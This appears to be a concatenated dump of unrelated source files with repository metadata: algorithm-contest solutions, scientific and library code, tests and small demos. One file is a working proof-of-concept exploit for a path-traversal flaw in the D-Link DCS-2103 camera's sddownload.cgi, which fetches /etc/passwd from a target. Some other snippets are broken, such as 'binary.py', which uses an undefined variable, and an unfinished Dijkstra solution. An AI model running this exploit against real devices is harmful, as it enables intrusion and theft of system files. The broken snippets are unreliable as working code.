count_rs=numpy.zeros((max_data[1]+1,max_data[2]+1))
nx=range(min_data[1], max_data[1]+2)
ny=range(min_data[2], max_data[2]+2)
count_rs, xedges, yedges = numpy.histogram2d(data[1][:,k], data[2][:,k], bins=(nx, ny))
count_rs_list.append(count_rs)
misc.pickle_save([count_rs_list,data], save_result_at)
else:
count_rs_list, data=misc.pickle_load(save_result_at)
ff=misc.fano_factor(data[2])
a=numpy.ones((2,2))
b=numpy.ones((3,3))
c=numpy.array([[1,2,3],[2,1,3],[3,2,1]])
d=numpy.array([[2,1],[2,2]])
mi_test=misc.mutual_information([d,c, a,b])
mi=misc.mutual_information(count_rs_list)
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3]))
max_data.append(numpy.max(count[i::3]))
print count_rs_list[0].shape, max_data, len(count_rs_list)
pylab.figure()
pylab.plot(time, ff)
pylab.figure()
for i in range(3):
pylab.subplot(3,1,i+1)
pylab.plot(time, numpy.sum(data[i], axis=0))
print 'Simulation sime', (t-ttime.time()) / 60., 'min'
pylab.show()
|
[
"mickelindahl@gmail.com"
] |
mickelindahl@gmail.com
|
28cd2ba0f453c1e05fbe64bea3586c73a9f79d23
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/xcp2k/classes/_ic1.py
|
dfa06f08d6b858b4ef14780d7a8e80c0a989bcb7
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from xcp2k.inputsection import InputSection
class _ic1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Print_ic_list = None
self.Eps_dist = None
self.Optimize_homo_lumo = None
self.Gw_eigenvalues = None
self.Gw_eigenvalues_beta = None
self._name = "IC"
self._keywords = {'Optimize_homo_lumo': 'OPTIMIZE_HOMO_LUMO', 'Gw_eigenvalues': 'GW_EIGENVALUES', 'Eps_dist': 'EPS_DIST', 'Print_ic_list': 'PRINT_IC_LIST', 'Gw_eigenvalues_beta': 'GW_EIGENVALUES_BETA'}
self._aliases = {'Optimize': 'Optimize_homo_lumo'}
@property
def Optimize(self):
"""
See documentation for Optimize_homo_lumo
"""
return self.Optimize_homo_lumo
@Optimize.setter
def Optimize(self, value):
self.Optimize_homo_lumo = value
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
5f7c905b69a5173153cc985d9e73093dceb5a83f
|
5c531de5e4759c904e608b4fc653b2b041f79a0e
|
/Amazon_735. Asteroid Collision.py
|
6737b4cae3d0689e2f94c48aac92eb951b2c6267
|
[] |
no_license
|
jianhui-ben/leetcode_python
|
133c7e6e5c7316d00607ba2e327239e002de28b2
|
fcc16124cc24a5993e27f5d97e78d8f290e68230
|
refs/heads/master
| 2022-06-05T22:32:18.034581
| 2022-05-17T02:27:11
| 2022-05-17T02:27:11
| 250,683,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,407
|
py
|
#735. Asteroid Collision
#We are given an array asteroids of integers representing asteroids in a row.
#For each asteroid, the absolute value represents its size, and the sign represents
#its direction (positive meaning right, negative meaning left). Each asteroid moves
#at the same speed.
#Find out the state of the asteroids after all collisions. If two asteroids meet,
#the smaller one will explode. If both are the same size, both will explode. Two
#asteroids moving in the same direction will never meet.
#Example 1:
#Input: asteroids = [5,10,-5]
#Output: [5,10]
#Explanation: The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
#Example 2:
#Input: asteroids = [8,-8]
#Output: []
#Explanation: The 8 and -8 collide exploding each other.
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
##better method:
out=[]
for star in asteroids:
while out and out[-1]>0 and star<0:
if abs(out[-1])>abs(star):
break
elif abs(out[-1])<abs(star):
out.pop()
elif abs(out[-1])==abs(star):
out.pop()
break
else:
out.append(star)
return out
# ##Ben's method
# positive=False
# temp=[]
# add_negative=True
# for i in range(len(asteroids)):
# if asteroids[i] < 0 and not positive:
# temp.append(asteroids[i])
# elif asteroids[i]>=0:
# positive=True
# temp.append(asteroids[i])
# elif asteroids[i]<0 and positive:
# while len(temp)>0 and temp[-1]>0:
# last_positive=temp.pop()
# if last_positive+ asteroids[i]>0:
# temp.append(last_positive)
# break
# elif last_positive+ asteroids[i]==0:
# add_negative=False
# break
# if (len(temp)==0 or temp[-1]<=0) and add_negative: temp.append(asteroids[i])
# add_negative=True
# if not temp: positive=False
# else: positive= temp[-1]>=0
# add_negative=True
# return temp
|
[
"jianhui.ben@gmail.com"
] |
jianhui.ben@gmail.com
|
720fea823a41bf05eb6a14e1f940971f38e10095
|
e77a3618d0afe63a2f00d87b61c3f19d3eba10d8
|
/plugins/beebeeto/poc_2014_0149.py
|
ff203f0727674fb7a8ebff1da4a637af1da4eb49
|
[] |
no_license
|
Explorer1092/coco
|
b54e88a527b29209de7c636833ac5d102514291b
|
15c5aba0972ac68dc4c874ddacf5986af5ac2a64
|
refs/heads/master
| 2020-05-31T07:03:19.277209
| 2019-01-29T14:36:45
| 2019-01-29T14:36:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0149',
'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi 任意文件下载漏洞 Exploit',
'author': 'foundu',
'create_date': '2014-11-19',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'D-Link',
'vul_version': 'DCS-2103',
'type': 'Arbitrary File Download',
'tag': ['D-Link漏洞', '任意文件下载漏洞', '/cgi-bin/sddownload.cgi', 'cgi'],
'desc': '''
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
I found these vulnerabilities at 11.07.2014 and later informed D-Link. But
they haven't answered. It looks like they are busy with fixing
vulnerabilities in DAP-1360, which I wrote about earlier.
''',
'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',
]
},
}
@classmethod
def exploit(cls, args):
payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
if 'root:' in content and 'nobody:' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['passwd'] = content
return args
verify = exploit
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run())
|
[
"834430486@qq.com"
] |
834430486@qq.com
|
21c0cebb2546807a8dd223104a08e5e29d58ec7c
|
62766deea531d0b89b86a53e6f51b94fd2a88f23
|
/AtCoder/ABC/131/c.py
|
fbe2beb18aab0fad58d1c7599493260ae7b68225
|
[
"MIT"
] |
permissive
|
ttyskg/ProgrammingCompetition
|
53620b07317ae5cbd1ee06272e573e3682ac15f3
|
885c5a1be228ae7ba9f00b3d63521c9ff7d21608
|
refs/heads/master
| 2023-08-18T08:38:33.068168
| 2023-08-15T04:28:13
| 2023-08-15T04:28:13
| 183,425,786
| 0
| 0
|
MIT
| 2023-08-15T04:28:14
| 2019-04-25T12:02:53
|
Python
|
UTF-8
|
Python
| false
| false
| 476
|
py
|
import sys
def gcd(a, b):
"""Euclidean Algorithm"""
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
def main():
input = sys.stdin.readline
A, B, C, D = map(int, input().split())
E = lcm(C, D)
total = B - (A-1)
mul_c = B // C - (A-1) // C
mul_d = B // D - (A-1) // D
mul_e = B // E - (A-1) // E
return total - (mul_c + mul_d - mul_e)
if __name__ == '__main__':
print(main())
|
[
"tatsu100311@gmail.com"
] |
tatsu100311@gmail.com
|
889b22757513884a8c6c50f0b76bbe2c55a22845
|
b515ebbe9b259cf8cc11bae3eb2cd9094d9dac80
|
/tests/integration/test_base.py
|
09c270270007ae701dc6d64c0735eb0fe39714a5
|
[
"MIT",
"Python-2.0"
] |
permissive
|
cambiumproject/python-quickbooks
|
a234e29555e37399f53a9909cf4c3cf61e9e7bc1
|
06110a4a88bb47b2e6349a193908c083d506dde1
|
refs/heads/master
| 2023-08-07T20:15:14.600671
| 2021-07-20T21:53:59
| 2021-07-20T21:53:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
import os
from unittest import TestCase
from intuitlib.client import AuthClient
from quickbooks.client import QuickBooks, Environments
class QuickbooksTestCase(TestCase):
def setUp(self):
super(QuickbooksTestCase, self).setUp()
self.auth_client = AuthClient(
client_id=os.environ.get('CLIENT_ID'),
client_secret=os.environ.get('CLIENT_SECRET'),
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
minorversion=59,
auth_client=self.auth_client,
refresh_token=os.environ.get('REFRESH_TOKEN'),
company_id=os.environ.get('COMPANY_ID'),
)
self.qb_client.sandbox = True
class QuickbooksUnitTestCase(TestCase):
def setUp(self):
super(QuickbooksUnitTestCase, self).setUp()
self.auth_client = AuthClient(
client_id='CLIENTID',
client_secret='CLIENT_SECRET',
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
#auth_client=self.auth_client,
refresh_token='REFRESH_TOKEN',
company_id='COMPANY_ID',
)
self.qb_client.sandbox = True
|
[
"edward.emanuel@gmail.com"
] |
edward.emanuel@gmail.com
|
843d5c4d45fddd036ed5fa1783b168dbde9b6640
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binary_20200524140021.py
|
cad576ae530c25621bd03b09d3d763a13dba320b
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
def solution(N):
print(N)
maximumCount = 0
well = format(9,"b")
print("wow",well)
# while( N >= 1):
# N = int(N / 2)
# # print("this",N)
# print("N",N/2,"well",N%2)
# if N % 2 == 0 :
# binaryNumber.append(0)
# else:
# binaryNumber.append(1)
# then reverse the number
s = [str(i) for i in well]
binary = int("".join(s))
intialNumber = None
lastNumber = None
totalCount = 0
print("binary",str(binary))
print("number",number)
for i in range(len(str(binary))):
if number[i] == 1:
intialNumber = 1
if i < len(number)-1:
if number[i] == 0 and number[i+1] :
lastNumber = 1
if intialNumber is not None and lastNumber is not None and number[i] == 0:
maximumCount = maximumCount + 1
else:
totalCount = maximumCount
maximumCount = 0
# return 0
print("total",totalCount)
solution(9)
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
efd20d62075642d05d33586f9a2f19037598aa02
|
ee41311a11a1c6baedafd9a914d5a1f8330fe8a9
|
/SANEF_LIVE/venv/Lib/site-packages/skimage/segmentation/slic_superpixels.py
|
b196dbffc726dfb4cbf2e1da2a6e255d3901f1ec
|
[] |
no_license
|
sethnanati/CodeRepoPython
|
2dffb7263620bd905bf694f348485d894a9513db
|
b55e66611d19b35e9926d1b1387320cf48e177c8
|
refs/heads/master
| 2023-07-07T11:16:12.958401
| 2021-02-13T10:09:48
| 2021-02-13T10:09:48
| 376,531,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,799
|
py
|
# coding=utf-8
from __future__ import division
import collections as coll
import numpy as np
from scipy import ndimage as ndi
from ..util import img_as_float, regular_grid
from ..segmentation._slic import (_slic_cython,
_enforce_label_connectivity_cython)
from ..color import rgb2lab
def slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,
spacing=None, multichannel=True, convert2lab=None,
enforce_connectivity=True, min_size_factor=0.5, max_size_factor=3,
slic_zero=False):
"""Segments image using k-means clustering in Color-(x,y,z) space.
Parameters
----------
image : 2D, 3D or 4D ndarray
Input image, which can be 2D or 3D, and grayscale or multichannel
(see `multichannel` parameter).
n_segments : int, optional
The (approximate) number of labels in the segmented output image.
compactness : float, optional
Balances color proximity and space proximity. Higher values give
more weight to space proximity, making superpixel shapes more
square/cubic. In SLICO mode, this is the initial compactness.
This parameter depends strongly on image contrast and on the
shapes of objects in the image. We recommend exploring possible
values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before
refining around a chosen value.
max_iter : int, optional
Maximum number of iterations of k-means.
sigma : float or (3,) array-like of floats, optional
Width of Gaussian smoothing kernel for pre-processing for each
dimension of the image. The same sigma is applied to each dimension in
case of a scalar value. Zero means no smoothing.
Note, that `sigma` is automatically scaled if it is scalar and a
manual voxel spacing is provided (see Notes section).
spacing : (3,) array-like of floats, optional
The voxel spacing along each image dimension. By default, `slic`
assumes uniform spacing (same voxel resolution along z, y and x).
This parameter controls the weights of the distances along z, y,
and x during k-means clustering.
multichannel : bool, optional
Whether the last axis of the image is to be interpreted as multiple
channels or another spatial dimension.
convert2lab : bool, optional
Whether the input should be converted to Lab colorspace prior to
segmentation. The input image *must* be RGB. Highly recommended.
This option defaults to ``True`` when ``multichannel=True`` *and*
``image.shape[-1] == 3``.
enforce_connectivity: bool, optional
Whether the generated segments are connected or not
min_size_factor: float, optional
Proportion of the minimum segment size to be removed with respect
to the supposed segment size ```depth*width*height/n_segments```
max_size_factor: float, optional
Proportion of the maximum connected segment size. A value of 3 works
in most of the cases.
slic_zero: bool, optional
Run SLIC-zero, the zero-parameter mode of SLIC. [2]_
Returns
-------
labels : 2D or 3D array
Integer mask indicating segment labels.
Raises
------
ValueError
If ``convert2lab`` is set to ``True`` but the last array
dimension is not of length 3.
Notes
-----
* If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to
segmentation.
* If `sigma` is scalar and `spacing` is provided, the kernel width is
divided along each dimension by the spacing. For example, if ``sigma=1``
and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This
ensures sensible smoothing for anisotropic images.
* The image is rescaled to be in [0, 1] prior to processing.
* Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To
interpret them as 3D with the last dimension having length 3, use
`multichannel=False`.
References
----------
.. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,
Pascal Fua, and Sabine Süsstrunk, SLIC Superpixels Compared to
State-of-the-art Superpixel Methods, TPAMI, May 2012.
.. [2] http://ivrg.epfl.ch/research/superpixels#SLICO
Examples
--------
>>> from skimage.segmentation import slic
>>> from skimage.data import astronaut
>>> img = astronaut()
>>> segments = slic(img, n_segments=100, compactness=10)
Increasing the compactness parameter yields more square regions:
>>> segments = slic(img, n_segments=100, compactness=20)
"""
image = img_as_float(image)
is_2d = False
if image.ndim == 2:
# 2D grayscale image
image = image[np.newaxis, ..., np.newaxis]
is_2d = True
elif image.ndim == 3 and multichannel:
# Make 2D multichannel image 3D with depth = 1
image = image[np.newaxis, ...]
is_2d = True
elif image.ndim == 3 and not multichannel:
# Add channel as single last dimension
image = image[..., np.newaxis]
if spacing is None:
spacing = np.ones(3)
elif isinstance(spacing, (list, tuple)):
spacing = np.array(spacing, dtype=np.double)
if not isinstance(sigma, coll.Iterable):
sigma = np.array([sigma, sigma, sigma], dtype=np.double)
sigma /= spacing.astype(np.double)
elif isinstance(sigma, (list, tuple)):
sigma = np.array(sigma, dtype=np.double)
if (sigma > 0).any():
# add zero smoothing for multichannel dimension
sigma = list(sigma) + [0]
image = ndi.gaussian_filter(image, sigma)
if multichannel and (convert2lab or convert2lab is None):
if image.shape[-1] != 3 and convert2lab:
raise ValueError("Lab colorspace conversion requires a RGB image.")
elif image.shape[-1] == 3:
image = rgb2lab(image)
depth, height, width = image.shape[:3]
# initialize cluster centroids for desired number of segments
grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]
slices = regular_grid(image.shape[:3], n_segments)
step_z, step_y, step_x = [int(s.step if s.step is not None else 1)
for s in slices]
segments_z = grid_z[slices]
segments_y = grid_y[slices]
segments_x = grid_x[slices]
segments_color = np.zeros(segments_z.shape + (image.shape[3],))
segments = np.concatenate([segments_z[..., np.newaxis],
segments_y[..., np.newaxis],
segments_x[..., np.newaxis],
segments_color],
axis=-1).reshape(-1, 3 + image.shape[3])
segments = np.ascontiguousarray(segments)
# we do the scaling of ratio in the same way as in the SLIC paper
# so the values have the same meaning
step = float(max((step_z, step_y, step_x)))
ratio = 1.0 / compactness
image = np.ascontiguousarray(image * ratio)
labels = _slic_cython(image, segments, step, max_iter, spacing, slic_zero)
if enforce_connectivity:
segment_size = depth * height * width / n_segments
min_size = int(min_size_factor * segment_size)
max_size = int(max_size_factor * segment_size)
labels = _enforce_label_connectivity_cython(labels,
min_size,
max_size)
if is_2d:
labels = labels[0]
return labels
|
[
"adeyemiadenuga@gmail.com"
] |
adeyemiadenuga@gmail.com
|
0a20a0a7c7b6b3c688405d2ef7bcee0b30ed230f
|
ee3e0a69093e82deff1bddf607f6ce0dde372c48
|
/coding_test/카카오 인턴/num_4.py
|
226a287c788a6bf68f50fcecbe70e1a4d17bfa7e
|
[] |
no_license
|
cndqjacndqja/algorithm_python
|
202f9990ea367629aecdd14304201eb6fa2aa37e
|
843269cdf8fb9d4c215c92a97fc2d007a8f96699
|
refs/heads/master
| 2023-06-24T08:12:29.639424
| 2021-07-24T05:08:46
| 2021-07-24T05:08:46
| 255,552,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from heapq import heappush, heappop
INF = int(1e9)
def solution(n, start, end, roads, traps):
data = [[] for _ in range(n+1)]
for i in roads:
a, b, c = i
data[a].append((b, c))
def dijkstra(start, end, n, data):
distance = [INF for _ in range(n+1)]
distance[start] = 0
q = []
heappush(q, (0, start))
while q:
dis, node = heappop(q)
if distance[node] < dis:
continue
for i in data[node]:
cost = dis + i[1]
if distance[i[0]] > cost:
heappush(q, (cost, i[0]))
distance[i[0]] = cost
return distance[end]
|
[
"cndqjacndqja@gmail.com"
] |
cndqjacndqja@gmail.com
|
4489ddbba60f18b2f96f68362668c0918617c6d0
|
e96cc817c768915eeff46027ded14e759e8042ff
|
/Python基础/字符串/判断.py
|
a08d4cb40f7a539f93ede6b04ae4724cf9c0e573
|
[] |
no_license
|
fovegage/learn-python
|
e22a32207cf513ba0f8c3428e9c00138987c2359
|
93b8d3513769a0b7d492a7b515f289fe3f1efc4a
|
refs/heads/master
| 2023-06-08T13:44:57.274677
| 2023-05-29T05:52:35
| 2023-05-29T05:52:35
| 148,493,932
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2018/12/27 14:45
# @Author : fovegage
# @Email : fovegage@gmail.com
# @File : 判断.py
# @Software: PyCharm
# islower 仅对字母判断
str = 'hello'
print(str.islower())
# isalnum() 判断是否由数字和字母组成
str = 'jjjssss22'
print(str.isalnum())
# isalpha() 判断只有字母 26个字母以外均报错
str = 'sjsksk'
print(str.isalpha())
# isdecimal() 若全部是十进制数返回true 否则false
demo = '1234'
print(demo.isdecimal())
# isidentifier() 是否是python标识符 由字母、数字、下划线组成 且不能以数字开头
str = '90'
print(str.isidentifier()) # False
# islower() 是否全部是小写
str = 'Tskksks'
print(str.islower()) # False
# isdigit() 是否全部是数字
num = '999'
print(num.isdigit())
# isspace() 若是空格或制表符返回True 其他均false 注意 '' 和 ' '是不一样的
str = '\t'
print(str.isspace())
# istitle() 判断是否是大写开头
str = 'dTg'
print(str.istitle())
# 若全部是数字返回true isdigit()的加强版 支持'²3455'
s = '\u00B23455'
print(repr(s))
print(s.isnumeric())
|
[
"fovegage@gmail.com"
] |
fovegage@gmail.com
|
de75179eb73337e3b223f1e9b50d70bc2438f591
|
b2d2ce1752ec5ea39b70ae37551bc162a748b469
|
/tests/unit/pypyraws/version_test.py
|
4ec7ddabcd59da582daa199da4ef6a25a4c6a7b9
|
[
"Apache-2.0"
] |
permissive
|
AvdN/pypyr-aws
|
05c28abb904e2f71a0fbdaacaeaf20b458f97c52
|
96477b2deb46b6db73fa6d64f1350991dd378c31
|
refs/heads/master
| 2021-01-24T06:46:41.130069
| 2017-06-02T15:03:15
| 2017-06-02T15:03:15
| 93,318,585
| 0
| 0
| null | 2017-06-04T14:23:52
| 2017-06-04T14:23:52
| null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
"""version.py unit tests."""
import pypyraws.version
import platform
def test_get_version():
actual = pypyraws.version.get_version()
expected = (f'pypyraws {pypyraws.version.__version__} '
f'python {platform.python_version()}')
assert actual == expected, "version not returning correctly"
|
[
"thomas@345.systems"
] |
thomas@345.systems
|
da5e68cfc1a7005a1e829bc6a913fac6fd2f1f7d
|
1e263d605d4eaf0fd20f90dd2aa4174574e3ebce
|
/components/ally-http/ally/http/spec/server.py
|
6712ab685dee0fe68395d0005537a4483bf101b2
|
[] |
no_license
|
galiminus/my_liveblog
|
698f67174753ff30f8c9590935d6562a79ad2cbf
|
550aa1d0a58fc30aa9faccbfd24c79a0ceb83352
|
refs/heads/master
| 2021-05-26T20:03:13.506295
| 2013-04-23T09:57:53
| 2013-04-23T09:57:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,564
|
py
|
'''
Created on Jun 1, 2012
@package: ally http
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides HTTP server specification.
'''
from ally.design.context import Context, defines, requires, optional
from ally.support.util_io import IInputStream
from collections import Iterable
import abc
# --------------------------------------------------------------------
# HTTP methods.
METHOD_GET = 'GET'
METHOD_DELETE = 'DELETE'
METHOD_POST = 'POST'
METHOD_PUT = 'PUT'
METHOD_OPTIONS = 'OPTIONS'
METHOD_UNKNOWN = 'UNKNOWN'
METHODS = frozenset((METHOD_GET, METHOD_DELETE, METHOD_POST, METHOD_PUT, METHOD_OPTIONS))
# --------------------------------------------------------------------
class RequestHTTP(Context):
'''
Context for HTTP request data.
'''
# ---------------------------------------------------------------- Defined
scheme = defines(str, doc='''
@rtype: string
The scheme URI protocol name to be used for the response.
''')
methodName = defines(str, doc='''
@rtype: string
The HTTP method name of the request.
''')
uriRoot = defines(str, doc='''
@rtype: string
The root URI to be considered for constructing a request path, basically the relative path root.
''')
uri = defines(str, doc='''
@rtype: string
The relative request URI.
''')
parameters = defines(list, doc='''
@rtype: list[tuple(string, string)]
The parameters of the request.
''')
headers = defines(dict, doc='''
@rtype: dictionary{string, string}
The raw headers.
''')
class RequestContentHTTP(Context):
'''
Context for HTTP request content data.
'''
# ---------------------------------------------------------------- Defined
source = defines(IInputStream, doc='''
@rtype: IInputStream
The source for the request content.
''')
class ResponseHTTP(Context):
'''
Context for HTTP response data.
'''
# ---------------------------------------------------------------- Required
code = requires(int, doc='''
@rtype: integer
The HTTP response code.
''')
isSuccess = requires(bool, doc='''
@rtype: boolean
True if the response is a success, False otherwise.
''')
# ---------------------------------------------------------------- Optional
text = optional(str, doc='''
@rtype: str
The response text message (a short message).
''')
headers = optional(dict, doc='''
@rtype: dictionary{String, string}
The response headers.
''')
class ResponseContentHTTP(Context):
'''
Context for HTTP response content data.
'''
# ---------------------------------------------------------------- Required
source = requires(IInputStream, Iterable, doc='''
@rtype: IInputStream|Iterable
The source for the response content.
''')
# --------------------------------------------------------------------
class IDecoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header retrieve, parsing and decoding.
'''
@abc.abstractmethod
def retrieve(self, name):
'''
Get the raw header value.
@param name: string
The name of the header to retrieve.
@return: string|None
The raw header value or None if there is no such header.
'''
@abc.abstractmethod
def decode(self, name):
'''
Get the decoded the header value.
@param name: string
The name of the header to decode.
@return: list[tuple(string, dictionary{string:string})]
A list of tuples having as the first entry the header value and the second entry a dictionary
with the value attribute.
'''
class IEncoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header encoding.
'''
@abc.abstractmethod
def encode(self, name, *value):
'''
Encodes the header values.
ex:
convert('multipart/formdata', 'mixed') == 'multipart/formdata, mixed'
convert(('multipart/formdata', ('charset', 'utf-8'), ('boundry', '12))) ==
'multipart/formdata; charset=utf-8; boundry=12'
@param name: string
The name of the header to set.
@param value: arguments[tuple(string, tuple(string, string))|string]
Tuples containing as first value found in the header and as the second value a tuple with the
values attribute.
'''
|
[
"etienne@spillemaeker.com"
] |
etienne@spillemaeker.com
|
db7daaad0a903a177dcefeb07c6912390cdeb411
|
b5fa959a5a1a6cd1e5027e41ed45b6dfb1c19151
|
/testapp/tests/test_models.py
|
63eb981a166d436d958ec9b87a1b3dde0dbd614a
|
[
"MIT"
] |
permissive
|
Mikekh84/learning-journal
|
13c8e036620d4286f7e6bf3c1d9df0c5e0d368d8
|
d0d5af7913790ab895a2fa530aa259cf2934f49b
|
refs/heads/master
| 2021-01-17T17:12:15.009156
| 2016-03-28T02:50:48
| 2016-03-28T02:50:48
| 54,362,834
| 0
| 1
| null | 2016-03-28T02:50:48
| 2016-03-21T05:43:15
|
Python
|
UTF-8
|
Python
| false
| false
| 511
|
py
|
# -*- coding: utf-8 -*-
from testapp.models import Entry, DBSession, render_markdown
def test_create_entry(dbtransaction):
"""Test for a change of state of the model."""
new_model = Entry(title="jill", text='jello')
assert new_model.id is None
DBSession.add(new_model)
DBSession.flush()
assert new_model.id is not None
def test_render_markdown():
"""Assert render markdown works."""
content = 'Hello'
output = render_markdown(content)
assert output == '<p>Hello</p>'
|
[
"nadia.bahrami@gmail.com"
] |
nadia.bahrami@gmail.com
|
e218ccbde421b4913b280795d031f3fc87789818
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_199/773.py
|
30a001a8f7c676f7eb2fe925665c826df0915c48
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 705
|
py
|
# Problem A. Oversized Pancake Flipper
import os
SOURCE = '%s/../Resources/Q1Al.in' % os.path.dirname(__file__)
TARGET = '%s/../Resources/Q1Al.out' % os.path.dirname(__file__)
INPUT = open(SOURCE).read().splitlines()
OUTPUT = open(TARGET, 'w')
T = int(INPUT.pop(0))
for t0 in xrange(T):
print >> OUTPUT, 'Case #%d:' % (t0 + 1),
S, K = INPUT.pop(0).split()
A, K = ['+' == s for s in S], int(K)
L = len(A)
r = 0
for i, a in enumerate(A):
if not a:
if i + K > L:
print >> OUTPUT, 'IMPOSSIBLE'
break
r += 1
for k in xrange(K):
A[i+k] = not A[i+k]
else:
print >> OUTPUT, r
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
30bab34cfeff4c18f9f343631ed0cdb6410ae39a
|
baf3996414315ffb60470c40c7ad797bf4e6897f
|
/02_ai/1_ml/3_data_preparation/code/chapter_18/02_model_evaluation.py
|
c6093bdc54ef4415a5811861005577357adb543d
|
[
"MIT"
] |
permissive
|
thiago-allue/portfolio
|
8fbbecca7ce232567aebe97c19944f444508b7f4
|
0acd8253dc7c5150fef9b2d46eead3db83ca42de
|
refs/heads/main
| 2023-03-15T22:10:21.109707
| 2022-09-14T17:04:35
| 2022-09-14T17:04:35
| 207,919,073
| 0
| 0
| null | 2019-11-13T18:18:23
| 2019-09-11T22:40:46
|
Python
|
UTF-8
|
Python
| false
| false
| 955
|
py
|
# evaluate knn on the raw diabetes dataset
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder
# load dataset
dataset = read_csv('pima-indians-diabetes.csv', header=None)
data = dataset.values
# separate into input and output columns
X, y = data[:, :-1], data[:, -1]
# ensure inputs are floats and output is an integer label
X = X.astype('float32')
y = LabelEncoder().fit_transform(y.astype('str'))
# define and configure the model
model = KNeighborsClassifier()
# evaluate the model
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
n_scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv, n_jobs=-1)
# report model performance
print('Accuracy: %.3f (%.3f)' % (mean(n_scores), std(n_scores)))
|
[
"thiago.allue@yahoo.com"
] |
thiago.allue@yahoo.com
|
7bf358f112e3ef7aa77ff185a38d1f372ce35085
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/data_analyze.py
|
1b53f51941b2a5bab76c5647d28bf9d31e0e44bf
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,937
|
py
|
"""
数据分析
详细研究过程见研究报告
"""
import json
import pandas as pd
import numpy as np
from decimal import Decimal
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
def save_as_file(data: dict, filename):
with open(filename, 'w', encoding='utf-8')as json_file:
